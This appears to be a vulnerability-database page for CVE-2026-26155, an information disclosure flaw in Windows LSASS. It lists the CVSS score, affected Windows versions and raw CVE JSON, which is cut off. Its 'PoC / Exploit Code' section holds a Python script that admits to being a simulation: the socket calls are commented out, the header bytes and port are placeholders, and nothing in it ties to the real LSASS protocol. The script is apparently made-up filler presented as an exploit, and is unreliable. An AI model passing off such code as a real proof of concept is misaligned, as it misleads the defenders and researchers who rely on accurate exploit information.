Security Vulnerability Report
中文
CVE-2026-26155 CVSS 6.5 MEDIUM

CVE-2026-26155

Published: 2026-04-14 18:16:47
Last Modified: 2026-04-24 20:02:07
Source: [email protected]

Description

Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:* - VULNERABLE
Microsoft Windows (具体受影响版本请参考微软安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept (PoC) for CVE-2026-26155 # This script is a conceptual demonstration for vulnerability analysis purposes only. # It simulates the interaction with the LSASS service to trigger the information disclosure. import socket import struct def send_exploit_packet(target_ip, target_port): """ Sends a crafted packet to the target LSASS service to trigger the info disclosure. Note: Actual exploitation requires specific protocol handling and payload structure. """ try: # Establish a connection to the target (Simulation) print(f"[*] Connecting to {target_ip}:{target_port}...") # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.connect((target_ip, target_port)) # Craft the malicious payload (Conceptual structure) # This payload targets the vulnerable logic in LSASS header = b"\x00\x01\x02\x03" # Example protocol header malformed_data = b"A" * 100 # Padding to trigger overflow/bad read payload = header + struct.pack("!I", len(malformed_data)) + malformed_data # Send payload # sock.send(payload) print("[+] Payload sent successfully.") # Receive response (Expected to leak memory data) # response = sock.recv(4096) # print(f"[+] Leaked data: {response}") # sock.close() print("[!] PoC execution finished. Check for memory disclosure.") except Exception as e: print(f"[-] Error during PoC execution: {e}") if __name__ == "__main__": # Replace with actual target details during authorized testing TARGET_IP = "192.168.1.10" TARGET_PORT = 1234 # Placeholder port send_exploit_packet(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26155", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:47.277", "lastModified": "2026-04-24T20:02:07.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "158C16A3-547E-4130-8428-8E429C37E573"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "58E1A340-D49A-4EBB-A750-876922ACD5CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "64248504-2307-45FC-8FF3-7A227CFD8675"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "9B1465B1-BDE6-4634-8F12-43F71D68A4D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "88A175C4-E033-4FE7-B2BF-8BAE14321BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "86DBF14A-F486-4FE7-9126-D1D54952FC6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "C375372B-D3D4-4B11-AAD8-69AC344C24BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "8CE2E268-E776-4697-9E43-33ABA4CDBE05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "269B8E88-6473-41DD-BA33-D9184B82CA58"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "FCBB431B-EF21-4454-BDA3-D8F276BE7A64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "B33CE091-B873-4C30-BA05-54A8C1839212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "E3AF28F3-D486-4B88-9E0E-371241024174"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "94EB36C7-1FF2-4B44-AD91-F3540F09393E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "14B23C3F-C8AC-491A-BCA5-EB6982C8F9E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "361B5DAB-8D1F-45D7-A33C-F49EBA56B5F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "ADC6CE99-AB5D-4DD5-82A9-892366C4B2FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "982DB0CA-5196-4E42-B2F7-994BE8179715"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "647CF9B5-8898-469B-9C09-D372A7843187"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEnd ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.